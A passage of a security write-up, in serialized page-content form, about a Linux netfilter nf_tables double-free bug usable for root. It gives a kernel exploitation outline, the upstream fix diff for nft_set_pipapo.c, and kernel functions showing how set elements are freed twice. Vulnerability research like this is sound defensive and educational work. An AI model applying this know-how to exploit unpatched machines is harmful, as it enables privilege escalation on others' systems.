distros.",{"type":28,"tag":63,"props":50186,"children":50188},{"id":50187},"the-kernel",[50189],{"type":33,"value":50190},"The kernel",{"type":28,"tag":29,"props":50192,"children":50193},{},[50194,50196],{"type":33,"value":50195},"The kernel lies at the very core of an OS; its purpose is not to be a regular application but to create a platform that applications can run on top of. The kernel touches hardware directly to implement everything you can expect from your OS, such as user isolation and permissions, networking, filesystem access, memory management, task scheduling, etc.\n⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀",{"type":28,"tag":206,"props":50197,"children":50200},{"alt":50198,"src":50199},"image","/posts/netfilter-universal-root-1-day/kernal.png",[],{"type":28,"tag":29,"props":50202,"children":50203},{},[50204],{"type":33,"value":50205},"The kernel exposes an interface that user applications can use to request things they can't do directly (e.g. map some memory to my process' virtual address space, expose some file to my process, open a network socket, etc.). This is called the syscall interface, the main form of passing data from userspace to kernelspace.",{"type":28,"tag":75,"props":50207,"children":50209},{"id":50208},"kernel-exploitation",[50210],{"type":33,"value":50211},"Kernel exploitation",{"type":28,"tag":29,"props":50213,"children":50214},{},[50215],{"type":33,"value":50216},"As the kernel processes requests passed by user applications, it is subject to bugs and security vulnerabilities just as any code would, ranging from logic issues to memory corruptions that attackers can use to hijack the execution in kernel context or escalate privileges in some other way. With that in mind, we can expect the typical kernel exploit to look like this:",{"type":28,"tag":2108,"props":50218,"children":50219},{},[50220,50225,50230],{"type":28,"tag":459,"props":50221,"children":50222},{},[50223],{"type":33,"value":50224},"Trigger some memory corruption in some kernel subsystem",{"type":28,"tag":459,"props":50226,"children":50227},{},[50228],{"type":33,"value":50229},"Use it to acquire some stronger primitive (Control-flow, Arb R/W, etc.)",{"type":28,"tag":459,"props":50231,"children":50232},{},[50233],{"type":33,"value":50234},"Use your current primitive to escalate your privileges (usually by changing the creds of your process or something with similar consequences)",{"type":28,"tag":29,"props":50236,"children":50237},{},[50238,50240,50247],{"type":33,"value":50239},"I strongly recommend reading Lkmidas' Intro to Kernel Exploitation ",{"type":28,"tag":87,"props":50241,"children":50244},{"href":50242,"rel":50243},"https://lkmidas.github.io/posts/20210123-linux-kernel-pwn-part-1/",[91],[50245],{"type":33,"value":50246},"blog post",{"type":33,"value":50248}," to become more familiar with the topic.",{"type":28,"tag":63,"props":50250,"children":50252},{"id":50251},"nf_tables",[50253],{"type":28,"tag":98,"props":50254,"children":50256},{"className":50255},[],[50257],{"type":33,"value":50251},{"type":28,"tag":29,"props":50259,"children":50260},{},[50261,50266,50268,50274,50275,50281,50283,50289],{"type":28,"tag":98,"props":50262,"children":50264},{"className":50263},[],[50265],{"type":33,"value":50251},{"type":33,"value":50267}," is a component of the netfilter subsystem of the Linux kernel. It is a package filtering mechanism, and it's the current backend used by tools like iptables and Firewalld. Its internals have been thoroughly discussed by other researchers ",{"type":28,"tag":87,"props":50269,"children":50272},{"href":50270,"rel":50271},"https://pwning.tech/nftables",[91],[50273],{"type":33,"value":1824},{"type":33,"value":825},{"type":28,"tag":87,"props":50276,"children":50279},{"href":50277,"rel":50278},"https://starlabs.sg/blog/2023/09-nftables-adventures-bug-hunting-and-n-day-exploitation",[91],[50280],{"type":33,"value":2794},{"type":33,"value":50282},". I recommend reading those briefly to understand the hierarchical structure of ",{"type":28,"tag":98,"props":50284,"children":50286},{"className":50285},[],[50287],{"type":33,"value":50288},"nf_table",{"type":33,"value":50290}," objects and how we can manipulate them to create configurable filtering mechanisms.",{"type":28,"tag":29,"props":50292,"children":50293},{},[50294],{"type":33,"value":50295},"For the sake of this blog post I'll omit any details that are not directly related to the vulnerability.",{"type":28,"tag":75,"props":50297,"children":50299},{"id":50298},"transactions",[50300],{"type":33,"value":50301},"Transactions",{"type":28,"tag":29,"props":50303,"children":50304},{},[50305,50307,50312,50314,50319],{"type":33,"value":50306},"A transaction is an interaction that updates ",{"type":28,"tag":98,"props":50308,"children":50310},{"className":50309},[],[50311],{"type":33,"value":50251},{"type":33,"value":50313}," objects/state. It's roughly composed of a batch of operations that modify some ",{"type":28,"tag":98,"props":50315,"children":50317},{"className":50316},[],[50318],{"type":33,"value":50251},{"type":33,"value":50320}," object (adding/removing/editing tables, sets, elements, objects, etc). They are roughly composed of 3 different passes:",{"type":28,"tag":2108,"props":50322,"children":50323},{},[50324,50334,50344],{"type":28,"tag":459,"props":50325,"children":50326},{},[50327,50332],{"type":28,"tag":4995,"props":50328,"children":50329},{},[50330],{"type":33,"value":50331},"Control plane",{"type":33,"value":50333},"\nPrepare each operation, and if some fail, abort the whole batch; otherwise, commit the entire batch.",{"type":28,"tag":459,"props":50335,"children":50336},{},[50337,50342],{"type":28,"tag":4995,"props":50338,"children":50339},{},[50340],{"type":33,"value":50341},"Commit path",{"type":33,"value":50343},"\nAfter the control plane, if all succeed, we apply the changes (effectively modify tables, sets, etc.).",{"type":28,"tag":459,"props":50345,"children":50346},{},[50347,50352],{"type":28,"tag":4995,"props":50348,"children":50349},{},[50350],{"type":33,"value":50351},"Abort path",{"type":33,"value":50353},"\nOnly triggered when some error condition is detected in the control plane; undo actions done during the control plane and skip commitment.",{"type":28,"tag":63,"props":50355,"children":50357},{"id":50356},"vulnerability-details",[50358],{"type":33,"value":50359},"Vulnerability details",{"type":28,"tag":29,"props":50361,"children":50362},{},[50363,50365,50371],{"type":33,"value":50364},"Moving on, let's check out the ",{"type":28,"tag":87,"props":50366,"children":50369},{"href":50367,"rel":50368},"https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b0e256f3dd2ba6532f37c5c22e07cb07a36031ee",[91],[50370],{"type":33,"value":2019},{"type":33,"value":50372}," that fixed the bug.",{"type":28,"tag":234,"props":50374,"children":50376},{"className":39980,"code":50375,"language":39982,"meta":7,"style":7},"diff --git a/net/netfilter/nft_set_pipapo.c b/net/netfilter/nft_set_pipapo.c\nindex c0ceea068936a6..df8de509024637 100644\n--- a/net/netfilter/nft_set_pipapo.c\n+++ b/net/netfilter/nft_set_pipapo.c\n@@ -2329,8 +2329,6 @@ static void nft_pipapo_destroy(const struct nft_ctx *ctx,\n\n        m = rcu_dereference_protected(priv->match, true);\n\n  if (m) {\n   rcu_barrier();\n \n-  nft_set_pipapo_match_destroy(ctx, set, m);\n-\n   for_each_possible_cpu(cpu)\n    pipapo_free_scratch(m, cpu);\n   free_percpu(m->scratch);\n@@ -2342,8 +2340,7 @@ static void nft_pipapo_destroy(const struct nft_ctx *ctx,\n  if (priv->clone) {\n   m = priv->clone;\n \n-  if (priv->dirty)\n-   nft_set_pipapo_match_destroy(ctx, set, m);\n+  nft_set_pipapo_match_destroy(ctx, set, m);\n \n   for_each_possible_cpu(cpu)\n    pipapo_free_scratch(priv->clone, cpu);\n",[50377],{"type":28,"tag":98,"props":50378,"children":50379},{"__ignoreMap":7},[50380,50388,50396,50404,50412,50420,50427,50435,50442,50450,50458,50466,50474,50482,50490,50498,50506,50514,50522,50530,50537,50545,50553,50561,50568,50575],{"type":28,"tag":116,"props":50381,"children":50382},{"class":245,"line":246},[50383],{"type":28,"tag":116,"props":50384,"children":50385},{"style":376},[50386],{"type":33,"value":50387},"diff --git a/net/netfilter/nft_set_pipapo.c b/net/netfilter/nft_set_pipapo.c\n",{"type":28,"tag":116,"props":50389,"children":50390},{"class":245,"line":256},[50391],{"type":28,"tag":116,"props":50392,"children":50393},{"style":266},[50394],{"type":33,"value":50395},"index c0ceea068936a6..df8de509024637 100644\n",{"type":28,"tag":116,"props":50397,"children":50398},{"class":245,"line":293},[50399],{"type":28,"tag":116,"props":50400,"children":50401},{"style":376},[50402],{"type":33,"value":50403},"--- a/net/netfilter/nft_set_pipapo.c\n",{"type":28,"tag":116,"props":50405,"children":50406},{"class":245,"line":361},[50407],{"type":28,"tag":116,"props":50408,"children":50409},{"style":376},[50410],{"type":33,"value":50411},"+++ b/net/netfilter/nft_set_pipapo.c\n",{"type":28,"tag":116,"props":50413,"children":50414},{"class":245,"line":387},[50415],{"type":28,"tag":116,"props":50416,"children":50417},{"style":266},[50418],{"type":33,"value":50419},"@@ -2329,8 +2329,6 @@ static void nft_pipapo_destroy(const struct nft_ctx *ctx,\n",{"type":28,"tag":116,"props":50421,"children":50422},{"class":245,"line":400},[50423],{"type":28,"tag":116,"props":50424,"children":50425},{"emptyLinePlaceholder":19},[50426],{"type":33,"value":1044},{"type":28,"tag":116,"props":50428,"children":50429},{"class":245,"line":614},[50430],{"type":28,"tag":116,"props":50431,"children":50432},{"style":266},[50433],{"type":33,"value":50434},"        m = rcu_dereference_protected(priv->match, true);\n",{"type":28,"tag":116,"props":50436,"children":50437},{"class":245,"line":631},[50438],{"type":28,"tag":116,"props":50439,"children":50440},{"emptyLinePlaceholder":19},[50441],{"type":33,"value":1044},{"type":28,"tag":116,"props":50443,"children":50444},{"class":245,"line":665},[50445],{"type":28,"tag":116,"props":50446,"children":50447},{"style":266},[50448],{"type":33,"value":50449},"  if (m) {\n",{"type":28,"tag":116,"props":50451,"children":50452},{"class":245,"line":713},[50453],{"type":28,"tag":116,"props":50454,"children":50455},{"style":266},[50456],{"type":33,"value":50457},"   rcu_barrier();\n",{"type":28,"tag":116,"props":50459,"children":50460},{"class":245,"line":750},[50461],{"type":28,"tag":116,"props":50462,"children":50463},{"style":266},[50464],{"type":33,"value":50465}," \n",{"type":28,"tag":116,"props":50467,"children":50468},{"class":245,"line":779},[50469],{"type":28,"tag":116,"props":50470,"children":50471},{"style":563},[50472],{"type":33,"value":50473},"-  nft_set_pipapo_match_destroy(ctx, set, m);\n",{"type":28,"tag":116,"props":50475,"children":50476},{"class":245,"line":796},[50477],{"type":28,"tag":116,"props":50478,"children":50479},{"style":563},[50480],{"type":33,"value":50481},"-\n",{"type":28,"tag":116,"props":50483,"children":50484},{"class":245,"line":847},[50485],{"type":28,"tag":116,"props":50486,"children":50487},{"style":266},[50488],{"type":33,"value":50489},"   for_each_possible_cpu(cpu)\n",{"type":28,"tag":116,"props":50491,"children":50492},{"class":245,"line":898},[50493],{"type":28,"tag":116,"props":50494,"children":50495},{"style":266},[50496],{"type":33,"value":50497},"    pipapo_free_scratch(m, cpu);\n",{"type":28,"tag":116,"props":50499,"children":50500},{"class":245,"line":907},[50501],{"type":28,"tag":116,"props":50502,"children":50503},{"style":266},[50504],{"type":33,"value":50505},"   free_percpu(m->scratch);\n",{"type":28,"tag":116,"props":50507,"children":50508},{"class":245,"line":981},[50509],{"type":28,"tag":116,"props":50510,"children":50511},{"style":266},[50512],{"type":33,"value":50513},"@@ -2342,8 +2340,7 @@ static void nft_pipapo_destroy(const struct nft_ctx *ctx,\n",{"type":28,"tag":116,"props":50515,"children":50516},{"class":245,"line":1011},[50517],{"type":28,"tag":116,"props":50518,"children":50519},{"style":266},[50520],{"type":33,"value":50521},"  if (priv->clone) {\n",{"type":28,"tag":116,"props":50523,"children":50524},{"class":245,"line":1029},[50525],{"type":28,"tag":116,"props":50526,"children":50527},{"style":266},[50528],{"type":33,"value":50529},"   m = priv->clone;\n",{"type":28,"tag":116,"props":50531,"children":50532},{"class":245,"line":1038},[50533],{"type":28,"tag":116,"props":50534,"children":50535},{"style":266},[50536],{"type":33,"value":50465},{"type":28,"tag":116,"props":50538,"children":50539},{"class":245,"line":1047},[50540],{"type":28,"tag":116,"props":50541,"children":50542},{"style":563},[50543],{"type":33,"value":50544},"-  if (priv->dirty)\n",{"type":28,"tag":116,"props":50546,"children":50547},{"class":245,"line":1071},[50548],{"type":28,"tag":116,"props":50549,"children":50550},{"style":563},[50551],{"type":33,"value":50552},"-   nft_set_pipapo_match_destroy(ctx, set, m);\n",{"type":28,"tag":116,"props":50554,"children":50555},{"class":245,"line":1137},[50556],{"type":28,"tag":116,"props":50557,"children":50558},{"style":350},[50559],{"type":33,"value":50560},"+  nft_set_pipapo_match_destroy(ctx, set, m);\n",{"type":28,"tag":116,"props":50562,"children":50563},{"class":245,"line":1181},[50564],{"type":28,"tag":116,"props":50565,"children":50566},{"style":266},[50567],{"type":33,"value":50465},{"type":28,"tag":116,"props":50569,"children":50570},{"class":245,"line":1212},[50571],{"type":28,"tag":116,"props":50572,"children":50573},{"style":266},[50574],{"type":33,"value":50489},{"type":28,"tag":116,"props":50576,"children":50577},{"class":245,"line":1254},[50578],{"type":28,"tag":116,"props":50579,"children":50580},{"style":266},[50581],{"type":33,"value":50582},"    pipapo_free_scratch(priv->clone, cpu);\n",{"type":28,"tag":29,"props":50584,"children":50585},{},[50586,50588,50594,50595,50601,50603,50609,50611,50617,50619,50624,50626,50632,50634,50640,50642,50648],{"type":33,"value":50587},"If the ",{"type":28,"tag":98,"props":50589,"children":50591},{"className":50590},[],[50592],{"type":33,"value":50593},"priv->dirty",{"type":33,"value":10659},{"type":28,"tag":98,"props":50596,"children":50598},{"className":50597},[],[50599],{"type":33,"value":50600},"priv->clone",{"type":33,"value":50602}," variables are set, ",{"type":28,"tag":98,"props":50604,"children":50606},{"className":50605},[],[50607],{"type":33,"value":50608},"nft_set_pipapo_match_destroy()",{"type":33,"value":50610}," is called twice, once with ",{"type":28,"tag":98,"props":50612,"children":50614},{"className":50613},[],[50615],{"type":33,"value":50616},"priv->match",{"type":33,"value":50618}," as an argument, and then again with ",{"type":28,"tag":98,"props":50620,"children":50622},{"className":50621},[],[50623],{"type":33,"value":50600},{"type":33,"value":50625},". Looking at what this function does, we can see that it is iterating over the ",{"type":28,"tag":98,"props":50627,"children":50629},{"className":50628},[],[50630],{"type":33,"value":50631},"setelem",{"type":33,"value":50633},"s of the ",{"type":28,"tag":98,"props":50635,"children":50637},{"className":50636},[],[50638],{"type":33,"value":50639},"set",{"type":33,"value":50641}," and calling ",{"type":28,"tag":98,"props":50643,"children":50645},{"className":50644},[],[50646],{"type":33,"value":50647},"nf_tables_set_elem_destroy()",{"type":33,"value":50649}," for each of them.",{"type":28,"tag":234,"props":50651,"children":50653},{"className":16176,"code":50652,"language":1797,"meta":7,"style":7},"static void nft_set_pipapo_match_destroy(const struct nft_ctx *ctx,\n      const struct nft_set *set,\n      struct nft_pipapo_match *m)\n{\n struct nft_pipapo_field *f;\n int i, r;\n\n for (i = 0, f = m->f; i \u003C m->field_count - 1; i++, f++)\n  ;\n\n for (r = 0; r \u003C f->rules; r++) {\n  struct nft_pipapo_elem *e;\n\n  if (r \u003C f->rules - 1 && f->mt[r + 1].e == f->mt[r].e)\n   continue;\n\n  e = f->mt[r].e;\n\n  nf_tables_set_elem_destroy(ctx, set, &e->priv);\n }\n}\n",[50654],{"type":28,"tag":98,"props":50655,"children":50656},{"__ignoreMap":7},[50657,50703,50731,50757,50764,50785,50798,50805,50902,50910,50917,50972,50993,51000,51102,51114,51121,51157,51164,51198,51205],{"type":28,"tag":116,"props":50658,"children":50659},{"class":245,"line":246},[50660,50665,50669,50674,50678,50682,50686,50691,50695,50699],{"type":28,"tag":116,"props":50661,"children":50662},{"style":376},[50663],{"type":33,"value":50664},"static",{"type":28,"tag":116,"props":50666,"children":50667},{"style":376},[50668],{"type":33,"value":2169},{"type":28,"tag":116,"props":50670,"children":50671},{"style":282},[50672],{"type":33,"value":50673}," nft_set_pipapo_match_destroy",{"type":28,"tag":116,"props":50675,"children":50676},{"style":266},[50677],{"type":33,"value":313},{"type":28,"tag":116,"props":50679,"children":50680},{"style":376},[50681],{"type":33,"value":9323},{"type":28,"tag":116,"props":50683,"children":50684},{"style":376},[50685],{"type":33,"value":20814},{"type":28,"tag":116,"props":50687,"children":50688},{"style":266},[50689],{"type":33,"value":50690}," nft_ctx ",{"type":28,"tag":116,"props":50692,"children":50693},{"style":370},[50694],{"type":33,"value":4240},{"type":28,"tag":116,"props":50696,"children":50697},{"style":272},[50698],{"type":33,"value":19944},{"type":28,"tag":116,"props":50700,"children":50701},{"style":266},[50702],{"type":33,"value":3178},{"type":28,"tag":116,"props":50704,"children":50705},{"class":245,"line":256},[50706,50710,50714,50719,50723,50727],{"type":28,"tag":116,"props":50707,"children":50708},{"style":376},[50709],{"type":33,"value":31196},{"type":28,"tag":116,"props":50711,"children":50712},{"style":376},[50713],{"type":33,"value":20814},{"type":28,"tag":116,"props":50715,"children":50716},{"style":266},[50717],{"type":33,"value":50718}," nft_set ",{"type":28,"tag":116,"props":50720,"children":50721},{"style":370},[50722],{"type":33,"value":4240},{"type":28,"tag":116,"props":50724,"children":50725},{"style":272},[50726],{"type":33,"value":50639},{"type":28,"tag":116,"props":50728,"children":50729},{"style":266},[50730],{"type":33,"value":3178},{"type":28,"tag":116,"props":50732,"children":50733},{"class":245,"line":293},[50734,50739,50744,50748,50753],{"type":28,"tag":116,"props":50735,"children":50736},{"style":376},[50737],{"type":33,"value":50738},"      struct",{"type":28,"tag":116,"props":50740,"children":50741},{"style":266},[50742],{"type":33,"value":50743}," nft_pipapo_match ",{"type":28,"tag":116,"props":50745,"children":50746},{"style":370},[50747],{"type":33,"value":4240},{"type":28,"tag":116,"props":50749,"children":50750},{"style":272},[50751],{"type":33,"value":50752},"m",{"type":28,"tag":116,"props":50754,"children":50755},{"style":266},[50756],{"type":33,"value":2830},{"type":28,"tag":116,"props":50758,"children":50759},{"class":245,"line":361},[50760],{"type":28,"tag":116,"props":50761,"children":50762},{"style":266},[50763],{"type":33,"value":10547},{"type":28,"tag":116,"props":50765,"children":50766},{"class":245,"line":387},[50767,50771,50776,50780],{"type":28,"tag":116,"props":50768,"children":50769},{"style":376},[50770],{"type":33,"value":20814},{"type":28,"tag":116,"props":50772,"children":50773},{"style":266},[50774],{"type":33,"value":50775}," nft_pipapo_field ",{"type":28,"tag":116,"props":50777,"children":50778},{"style":370},[50779],{"type":33,"value":4240},{"type":28,"tag":116,"props":50781,"children":50782},{"style":266},[50783],{"type":33,"value":50784},"f;\n",{"type":28,"tag":116,"props":50786,"children":50787},{"class":245,"line":400},[50788,50793],{"type":28,"tag":116,"props":50789,"children":50790},{"style":376},[50791],{"type":33,"value":50792}," int",{"type":28,"tag":116,"props":50794,"children":50795},{"style":266},[50796],{"type":33,"value":50797}," i, r;\n",{"type":28,"tag":116,"props":50799,"children":50800},{"class":245,"line":614},[50801],{"type":28,"tag":116,"props":50802,"children":50803},{"emptyLinePlaceholder":19},[50804],{"type":33,"value":1044},{"type":28,"tag":116,"props":50806,"children":50807},{"class":245,"line":631},[50808,50813,50818,50822,50826,50831,50835,50840,50844,50848,50853,50857,50861,50865,50870,50875,50879,50884,50889,50894,50898],{"type":28,"tag":116,"props":50809,"children":50810},{"style":260},[50811],{"type":33,"value":50812}," for",{"type":28,"tag":116,"props":50814,"children":50815},{"style":266},[50816],{"type":33,"value":50817}," (i ",{"type":28,"tag":116,"props":50819,"children":50820},{"style":370},[50821],{"type":33,"value":373},{"type":28,"tag":116,"props":50823,"children":50824},{"style":350},[50825],{"type":33,"value":2718},{"type":28,"tag":116,"props":50827,"children":50828},{"style":266},[50829],{"type":33,"value":50830},", f ",{"type":28,"tag":116,"props":50832,"children":50833},{"style":370},[50834],{"type":33,"value":373},{"type":28,"tag":116,"props":50836,"children":50837},{"style":272},[50838],{"type":33,"value":50839}," m",{"type":28,"tag":116,"props":50841,"children":50842},{"style":266},[50843],{"type":33,"value":13423},{"type":28,"tag":116,"props":50845,"children":50846},{"style":272},[50847],{"type":33,"value":32719},{"type":28,"tag":116,"props":50849,"children":50850},{"style":266},[50851],{"type":33,"value":50852},"; i ",{"type":28,"tag":116,"props":50854,"children":50855},{"style":370},[50856],{"type":33,"value":514},{"type":28,"tag":116,"props":50858,"children":50859},{"style":272},[50860],{"type":33,"value":50839},{"type":28,"tag":116,"props":50862,"children":50863},{"style":266},[50864],{"type":33,"value":13423},{"type":28,"tag":116,"props":50866,"children":50867},{"style":272},[50868],{"type":33,"value":50869},"field_count",{"type":28,"tag":116,"props":50871,"children":50872},{"style":370},[50873],{"type":33,"value":50874}," -",{"type":28,"tag":116,"props":50876,"children":50877},{"style":350},[50878],{"type":33,"value":4192},{"type":28,"tag":116,"props":50880,"children":50881},{"style":266},[50882],{"type":33,"value":50883},"; i",{"type":28,"tag":116,"props":50885,"children":50886},{"style":370},[50887],{"type":33,"value":50888},"++",{"type":28,"tag":116,"props":50890,"children":50891},{"style":266},[50892],{"type":33,"value":50893},", f",{"type":28,"tag":116,"props":50895,"children":50896},{"style":370},[50897],{"type":33,"value":50888},{"type":28,"tag":116,"props":50899,"children":50900},{"style":266},[50901],{"type":33,"value":2830},{"type":28,"tag":116,"props":50903,"children":50904},{"class":245,"line":665},[50905],{"type":28,"tag":116,"props":50906,"children":50907},{"style":266},[50908],{"type":33,"value":50909},"  ;\n",{"type":28,"tag":116,"props":50911,"children":50912},{"class":245,"line":713},[50913],{"type":28,"tag":116,"props":50914,"children":50915},{"emptyLinePlaceholder":19},[50916],{"type":33,"value":1044},{"type":28,"tag":116,"props":50918,"children":50919},{"class":245,"line":750},[50920,50924,50929,50933,50937,50942,50946,50950,50954,50959,50964,50968],{"type":28,"tag":116,"props":50921,"children":50922},{"style":260},[50923],{"type":33,"value":50812},{"type":28,"tag":116,"props":50925,"children":50926},{"style":266},[50927],{"type":33,"value":50928}," (r ",{"type":28,"tag":116,"props":50930,"children":50931},{"style":370},[50932],{"type":33,"value":373},{"type":28,"tag":116,"props":50934,"children":50935},{"style":350},[50936],{"type":33,"value":2718},{"type":28,"tag":116,"props":50938,"children":50939},{"style":266},[50940],{"type":33,"value":50941},"; r ",{"type":28,"tag":116,"props":50943,"children":50944},{"style":370},[50945],{"type":33,"value":514},{"type":28,"tag":116,"props":50947,"children":50948},{"style":272},[50949],{"type":33,"value":32605},{"type":28,"tag":116,"props":50951,"children":50952},{"style":266},[50953],{"type":33,"value":13423},{"type":28,"tag":116,"props":50955,"children":50956},{"style":272},[50957],{"type":33,"value":50958},"rules",{"type":28,"tag":116,"props":50960,"children":50961},{"style":266},[50962],{"type":33,"value":50963},"; r",{"type":28,"tag":116,"props":50965,"children":50966},{"style":370},[50967],{"type":33,"value":50888},{"type":28,"tag":116,"props":50969,"children":50970},{"style":266},[50971],{"type":33,"value":844},{"type":28,"tag":116,"props":50973,"children":50974},{"class":245,"line":779},[50975,50979,50984,50988],{"type":28,"tag":116,"props":50976,"children":50977},{"style":376},[50978],{"type":33,"value":5468},{"type":28,"tag":116,"props":50980,"children":50981},{"style":266},[50982],{"type":33,"value":50983}," nft_pipapo_elem ",{"type":28,"tag":116,"props":50985,"children":50986},{"style":370},[50987],{"type":33,"value":4240},{"type":28,"tag":116,"props":50989,"children":50990},{"style":266},[50991],{"type":33,"value":50992},"e;\n",{"type":28,"tag":116,"props":50994,"children":50995},{"class":245,"line":796},[50996],{"type":28,"tag":116,"props":50997,"children":50998},{"emptyLinePlaceholder":19},[50999],{"type":33,"value":1044},{"type":28,"tag":116,"props":51001,"children":51002},{"class":245,"line":847},[51003,51007,51011,51015,51019,51023,51027,51031,51035,51039,51043,51047,51052,51057,51061,51065,51069,51073,51077,51081,51085,51089,51094,51098],{"type":28,"tag":116,"props":51004,"children":51005},{"style":260},[51006],{"type":33,"value":31045},{"type":28,"tag":116,"props":51008,"children":51009},{"style":266},[51010],{"type":33,"value":50928},{"type":28,"tag":116,"props":51012,"children":51013},{"style":370},[51014],{"type":33,"value":514},{"type":28,"tag":116,"props":51016,"children":51017},{"style":272},[51018],{"type":33,"value":32605},{"type":28,"tag":116,"props":51020,"children":51021},{"style":266},[51022],{"type":33,"value":13423},{"type":28,"tag":116,"props":51024,"children":51025},{"style":272},[51026],{"type":33,"value":50958},{"type":28,"tag":116,"props":51028,"children":51029},{"style":370},[51030],{"type":33,"value":50874},{"type":28,"tag":116,"props":51032,"children":51033},{"style":350},[51034],{"type":33,"value":4192},{"type":28,"tag":116,"props":51036,"children":51037},{"style":370},[51038],{"type":33,"value":13851},{"type":28,"tag":116,"props":51040,"children":51041},{"style":272},[51042],{"type":33,"value":32605},{"type":28,"tag":116,"props":51044,"children":51045},{"style":266},[51046],{"type":33,"value":13423},{"type":28,"tag":116,"props":51048,"children":51049},{"style":272},[51050],{"type":33,"value":51051},"mt",{"type":28,"tag":116,"props":51053,"children":51054},{"style":266},[51055],{"type":33,"value":51056},"[r ",{"type":28,"tag":116,"props":51058,"children":51059},{"style":370},[51060],{"type":33,"value":2268},{"type":28,"tag":116,"props":51062,"children":51063},{"style":350},[51064],{"type":33,"value":4192},{"type":28,"tag":116,"props":51066,"children":51067},{"style":266},[51068],{"type":33,"value":49968},{"type":28,"tag":116,"props":51070,"children":51071},{"style":272},[51072],{"type":33,"value":1413},{"type":28,"tag":116,"props":51074,"children":51075},{"style":370},[51076],{"type":33,"value":2953},{"type":28,"tag":116,"props":51078,"children":51079},{"style":272},[51080],{"type":33,"value":32605},{"type":28,"tag":116,"props":51082,"children":51083},{"style":266},[51084],{"type":33,"value":13423},{"type":28,"tag":116,"props":51086,"children":51087},{"style":272},[51088],{"type":33,"value":51051},{"type":28,"tag":116,"props":51090,"children":51091},{"style":266},[51092],{"type":33,"value":51093},"[r].",{"type":28,"tag":116,"props":51095,"children":51096},{"style":272},[51097],{"type":33,"value":1413},{"type":28,"tag":116,"props":51099,"children":51100},{"style":266},[51101],{"type":33,"value":2830},{"type":28,"tag":116,"props":51103,"children":51104},{"class":245,"line":898},[51105,51110],{"type":28,"tag":116,"props":51106,"children":51107},{"style":260},[51108],{"type":33,"value":51109},"   continue",{"type":28,"tag":116,"props":51111,"children":51112},{"style":266},[51113],{"type":33,"value":384},{"type":28,"tag":116,"props":51115,"children":51116},{"class":245,"line":907},[51117],{"type":28,"tag":116,"props":51118,"children":51119},{"emptyLinePlaceholder":19},[51120],{"type":33,"value":1044},{"type":28,"tag":116,"props":51122,"children":51123},{"class":245,"line":981},[51124,51129,51133,51137,51141,51145,51149,51153],{"type":28,"tag":116,"props":51125,"children":51126},{"style":266},[51127],{"type":33,"value":51128},"  e ",{"type":28,"tag":116,"props":51130,"children":51131},{"style":370},[51132],{"type":33,"value":373},{"type":28,"tag":116,"props":51134,"children":51135},{"style":272},[51136],{"type":33,"value":32605},{"type":28,"tag":116,"props":51138,"children":51139},{"style":266},[51140],{"type":33,"value":13423},{"type":28,"tag":116,"props":51142,"children":51143},{"style":272},[51144],{"type":33,"value":51051},{"type":28,"tag":116,"props":51146,"children":51147},{"style":266},[51148],{"type":33,"value":51093},{"type":28,"tag":116,"props":51150,"children":51151},{"style":272},[51152],{"type":33,"value":1413},{"type":28,"tag":116,"props":51154,"children":51155},{"style":266},[51156],{"type":33,"value":384},{"type":28,"tag":116,"props":51158,"children":51159},{"class":245,"line":1011},[51160],{"type":28,"tag":116,"props":51161,"children":51162},{"emptyLinePlaceholder":19},[51163],{"type":33,"value":1044},{"type":28,"tag":116,"props":51165,"children":51166},{"class":245,"line":1029},[51167,51172,51177,51181,51185,51189,51194],{"type":28,"tag":116,"props":51168,"children":51169},{"style":282},[51170],{"type":33,"value":51171},"  nf_tables_set_elem_destroy",{"type":28,"tag":116,"props":51173,"children":51174},{"style":266},[51175],{"type":33,"value":51176},"(ctx, set, ",{"type":28,"tag":116,"props":51178,"children":51179},{"style":370},[51180],{"type":33,"value":2780},{"type":28,"tag":116,"props":51182,"children":51183},{"style":272},[51184],{"type":33,"value":1413},{"type":28,"tag":116,"props":51186,"children":51187},{"style":266},[51188],{"type":33,"value":13423},{"type":28,"tag":116,"props":51190,"children":51191},{"style":272},[51192],{"type":33,"value":51193},"priv",{"type":28,"tag":116,"props":51195,"children":51196},{"style":266},[51197],{"type":33,"value":895},{"type":28,"tag":116,"props":51199,"children":51200},{"class":245,"line":1038},[51201],{"type":28,"tag":116,"props":51202,"children":51203},{"style":266},[51204],{"type":33,"value":9264},{"type":28,"tag":116,"props":51206,"children":51207},{"class":245,"line":1047},[51208],{"type":28,"tag":116,"props":51209,"children":51210},{"style":266},[51211],{"type":33,"value":406},{"type":28,"tag":29,"props":51213,"children":51214},{},[51215,51217,51223,51225,51230],{"type":33,"value":51216},"Which will then ",{"type":28,"tag":98,"props":51218,"children":51220},{"className":51219},[],[51221],{"type":33,"value":51222},"kfree()",{"type":33,"value":51224}," the ",{"type":28,"tag":98,"props":51226,"children":51228},{"className":51227},[],[51229],{"type":33,"value":50631},{"type":33,"value":141},{"type":28,"tag":234,"props":51232,"children":51234},{"className":16176,"code":51233,"language":1797,"meta":7,"style":7},"void nf_tables_set_elem_destroy(const struct nft_ctx *ctx,\n    const struct nft_set *set,\n    const struct nft_elem_priv *elem_priv)\n{\n struct nft_set_ext *ext = nft_set_elem_ext(set, elem_priv);\n\n if (nft_set_ext_exists(ext, NFT_SET_EXT_EXPRESSIONS))\n  nft_set_elem_expr_destroy(ctx, nft_set_ext_expr(ext));\n\n kfree(elem_priv);\n}\n",[51235],{"type":28,"tag":98,"props":51236,"children":51237},{"__ignoreMap":7},[51238,51279,51307,51336,51343,51378,51385,51406,51429,51436,51449],{"type":28,"tag":116,"props":51239,"children":51240},{"class":245,"line":246},[51241,51246,51251,51255,51259,51263,51267,51271,51275],{"type":28,"tag":116,"props":51242,"children":51243},{"style":376},[51244],{"type":33,"value":51245},"void",{"type":28,"tag":116,"props":51247,"children":51248},{"style":282},[51249],{"type":33,"value":51250}," 